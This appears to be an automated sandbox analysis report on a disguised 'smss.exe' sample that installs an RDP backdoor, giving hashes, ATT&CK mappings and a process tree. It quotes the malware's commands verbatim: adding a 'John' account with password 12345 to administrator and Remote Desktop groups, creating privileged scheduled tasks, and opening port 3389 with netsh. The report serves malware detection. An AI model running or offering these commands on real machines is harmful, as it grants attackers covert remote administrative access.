Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
26-08-2024 17:48
Behavioral task
behavioral1
Sample
smss.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
smss.exe
Resource
win10v2004-20240802-en
General
-
Target
smss.exe
-
Size
9.4MB
-
MD5
6fde344165a369c3586a68317279247c
-
SHA1
e39b5038f44757a7049c4ebabbd6f62deb280796
-
SHA256
90f414ca8e7fe410a19ea1be7895f8b7df55b35d4289f1bd7c8900b2c886f4b4
-
SHA512
880650d5db061a4aab3df0c99ed1871de4347fb6ed7305c596fa4b75ec57e9c7acecebeeef675ba864d727a898963fe397af08a5d71e7993289299764931349a
-
SSDEEP
196608:uQmw1JCIvqD9gd1lqFxsPE41SfWj+gzjt5s9di7aH6CcvG:uQr9qFxOE41+Wj5zjLs9U7aaRvG
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
smss.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ smss.exe -
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
Processes:
cmd.exenet.exenet1.exepid process 3004 cmd.exe 852 net.exe 1856 net1.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 4704 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
Processes:
RDPWinst.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWinst.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
smss.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion smss.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
smss.exewinserv.exewinserv.exewinserv.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation smss.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation winserv.exe -
Executes dropped EXE 5 IoCs
Processes:
winserv.exewinserv.exeRDPWinst.exewinserv.exewinserv.exepid process 4160 winserv.exe 4608 winserv.exe 4420 RDPWinst.exe 368 winserv.exe 4004 winserv.exe -
Loads dropped DLL 1 IoCs
Processes:
svchost.exepid process 2868 svchost.exe -
Processes:
resource yara_rule behavioral2/memory/4244-0-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-3-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-2-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-4-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-5-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-6-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-7-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-8-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-9-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-25-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-27-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-52-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida behavioral2/memory/4244-60-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp themida -
Processes:
smss.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA smss.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 34 ip-api.com -
Modifies WinLogon 2 TTPs 1 IoCs
Processes:
RDPWinst.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWinst.exe -
AutoIT Executable 11 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral2/memory/4244-3-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp autoit_exe behavioral2/memory/4244-4-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp autoit_exe behavioral2/memory/4244-5-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp autoit_exe behavioral2/memory/4244-6-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp autoit_exe behavioral2/memory/4244-7-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp autoit_exe behavioral2/memory/4244-8-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp autoit_exe behavioral2/memory/4244-9-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp autoit_exe behavioral2/memory/4244-25-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp autoit_exe behavioral2/memory/4244-27-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp autoit_exe behavioral2/memory/4244-52-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp autoit_exe behavioral2/memory/4244-60-0x00007FF7C4C10000-0x00007FF7C5C43000-memory.dmp autoit_exe -
Drops file in System32 directory 1 IoCs
Processes:
RDPWinst.exedescription ioc process File created C:\Windows\System32\rfxvmt.dll RDPWinst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
smss.exepid process 4244 smss.exe -
Drops file in Program Files directory 5 IoCs
Processes:
smss.exeRDPWinst.exesvchost.exedescription ioc process File opened for modification C:\Program Files\RDP Wrapper smss.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini smss.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWinst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWinst.exe File opened for modification \??\c:\program files\rdp wrapper\rdpwrap.txt svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
winserv.exewinserv.exewinserv.exeRDPWinst.exewinserv.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWinst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
smss.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString smss.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1504 timeout.exe -
Modifies registry class 3 IoCs
Processes:
smss.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage smss.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\MIME\Database smss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset smss.exe -
NTFS ADS 1 IoCs
Processes:
smss.exedescription ioc process File opened for modification C:\ProgramData\Setup\winmgmts:\ smss.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 920 schtasks.exe 2700 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
smss.exewinserv.exewinserv.exesvchost.exepid process 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4160 winserv.exe 4160 winserv.exe 4160 winserv.exe 4160 winserv.exe 4160 winserv.exe 4160 winserv.exe 4608 winserv.exe 4608 winserv.exe 4608 winserv.exe 4608 winserv.exe 2868 svchost.exe 2868 svchost.exe 2868 svchost.exe 2868 svchost.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe 4244 smss.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 652 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
winserv.exewinserv.exeRDPWinst.exesvchost.exedescription pid process Token: SeDebugPrivilege 4160 winserv.exe Token: SeTakeOwnershipPrivilege 4608 winserv.exe Token: SeTcbPrivilege 4608 winserv.exe Token: SeTcbPrivilege 4608 winserv.exe Token: SeDebugPrivilege 4420 RDPWinst.exe Token: SeAuditPrivilege 2868 svchost.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
winserv.exewinserv.exewinserv.exewinserv.exepid process 4160 winserv.exe 4160 winserv.exe 4160 winserv.exe 4160 winserv.exe 4608 winserv.exe 4608 winserv.exe 4608 winserv.exe 4608 winserv.exe 368 winserv.exe 368 winserv.exe 368 winserv.exe 368 winserv.exe 4004 winserv.exe 4004 winserv.exe 4004 winserv.exe 4004 winserv.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
smss.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exeRDPWinst.execmd.exedescription pid process target process PID 4244 wrote to memory of 920 4244 smss.exe schtasks.exe PID 4244 wrote to memory of 920 4244 smss.exe schtasks.exe PID 4244 wrote to memory of 2700 4244 smss.exe schtasks.exe PID 4244 wrote to memory of 2700 4244 smss.exe schtasks.exe PID 4244 wrote to memory of 4160 4244 smss.exe winserv.exe PID 4244 wrote to memory of 4160 4244 smss.exe winserv.exe PID 4244 wrote to memory of 4160 4244 smss.exe winserv.exe PID 4244 wrote to memory of 800 4244 smss.exe cmd.exe PID 4244 wrote to memory of 800 4244 smss.exe cmd.exe PID 4244 wrote to memory of 440 4244 smss.exe cmd.exe PID 4244 wrote to memory of 440 4244 smss.exe cmd.exe PID 4244 wrote to memory of 4660 4244 smss.exe cmd.exe PID 4244 wrote to memory of 4660 4244 smss.exe cmd.exe PID 800 wrote to memory of 4844 800 cmd.exe net.exe PID 800 wrote to memory of 4844 800 cmd.exe net.exe PID 4844 wrote to memory of 4640 4844 net.exe net1.exe PID 4844 wrote to memory of 4640 4844 net.exe net1.exe PID 440 wrote to memory of 2496 440 cmd.exe net.exe PID 440 wrote to memory of 2496 440 cmd.exe net.exe PID 2496 wrote to memory of 3216 2496 net.exe net1.exe PID 2496 wrote to memory of 3216 2496 net.exe net1.exe PID 4660 wrote to memory of 2316 4660 cmd.exe net.exe PID 4660 wrote to memory of 2316 4660 cmd.exe net.exe PID 2316 wrote to memory of 748 2316 net.exe net1.exe PID 2316 wrote to memory of 748 2316 net.exe net1.exe PID 4244 wrote to memory of 4848 4244 smss.exe cmd.exe PID 4244 wrote to memory of 4848 4244 smss.exe cmd.exe PID 4244 wrote to memory of 2252 4244 smss.exe cmd.exe PID 4244 wrote to memory of 2252 4244 smss.exe cmd.exe PID 4848 wrote to memory of 348 4848 cmd.exe net.exe PID 4848 wrote to memory of 348 4848 cmd.exe net.exe PID 348 wrote to memory of 4944 348 net.exe net1.exe PID 348 wrote to memory of 4944 348 net.exe net1.exe PID 4244 wrote to memory of 1828 4244 smss.exe cmd.exe PID 4244 wrote to memory of 1828 4244 smss.exe cmd.exe PID 2252 wrote to memory of 2908 2252 cmd.exe net.exe PID 2252 wrote to memory of 2908 2252 cmd.exe net.exe PID 2908 wrote to memory of 1300 2908 net.exe net1.exe PID 2908 wrote to memory of 1300 2908 net.exe net1.exe PID 1828 wrote to memory of 3900 1828 cmd.exe net.exe PID 1828 wrote to memory of 3900 1828 cmd.exe net.exe PID 3900 wrote to memory of 2100 3900 net.exe net1.exe PID 3900 wrote to memory of 2100 3900 net.exe net1.exe PID 4244 wrote to memory of 3004 4244 smss.exe cmd.exe PID 4244 wrote to memory of 3004 4244 smss.exe cmd.exe PID 3004 wrote to memory of 852 3004 cmd.exe net.exe PID 3004 wrote to memory of 852 3004 cmd.exe net.exe PID 852 wrote to memory of 1856 852 net.exe net1.exe PID 852 wrote to memory of 1856 852 net.exe net1.exe PID 4244 wrote to memory of 4420 4244 smss.exe RDPWinst.exe PID 4244 wrote to memory of 4420 4244 smss.exe RDPWinst.exe PID 4244 wrote to memory of 4420 4244 smss.exe RDPWinst.exe PID 4420 wrote to memory of 4704 4420 RDPWinst.exe netsh.exe PID 4420 wrote to memory of 4704 4420 RDPWinst.exe netsh.exe PID 4244 wrote to memory of 4732 4244 smss.exe cmd.exe PID 4244 wrote to memory of 4732 4244 smss.exe cmd.exe PID 4732 wrote to memory of 1504 4732 cmd.exe timeout.exe PID 4732 wrote to memory of 1504 4732 cmd.exe timeout.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\smss.exe"C:\Users\Admin\AppData\Local\Temp\smss.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:920
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:2700
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4160 -
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add2⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\system32\net.exenet user John 12345 /add3⤵
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add4⤵PID:4640
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add4⤵PID:3216
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add4⤵PID:748
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add4⤵PID:4944
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\system32\net.exenet localgroup "Administrators" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add4⤵PID:1300
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\system32\net.exenet localgroup "Administradores" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add4⤵PID:2100
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add2⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add3⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add4⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1856
-
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i2⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\system32\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
PID:1504
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:4684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:368
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4004
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
2KB
MD5bc909d39981af556d07dc67178f61472
SHA1a4e5b1c5bc746435a5baf11b728e83fb8e654da0
SHA25610cf28ab39bf7ba76b91b043a007006d13d4a661fbcaad3d7820c19407b1e6a8
SHA512acf34884a865cdabfbb9a49b948ccc74fe1e158636b23e2f728c2df6fd2fb7bda0929eeddf4bf58d90b034215dafa5e2c697050c51c2f2259ff77fa02d80f51a
-
Filesize
10.2MB
MD53f4f5a6cb95047fea6102bd7d2226aa9
SHA1fc09dd898b6e7ff546e4a7517a715928fbafc297
SHA25699fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98
SHA512de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688
-
Filesize
315B
MD5155557517f00f2afc5400ba9dc25308e
SHA177a53a8ae146cf1ade1c9d55bbd862cbeb6db940
SHA256f00d027b0ed99814846378065b3da90d72d76307d37b7be46f5a480f425a764e
SHA51240baee6e6b22c386886d89172ad7c17605166f992f2d364c68d90b9874ab6f7b85e0accc91e83b4fbd2ae702def365f23542f22f6be7ff2f7949496cc0ba8a32
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26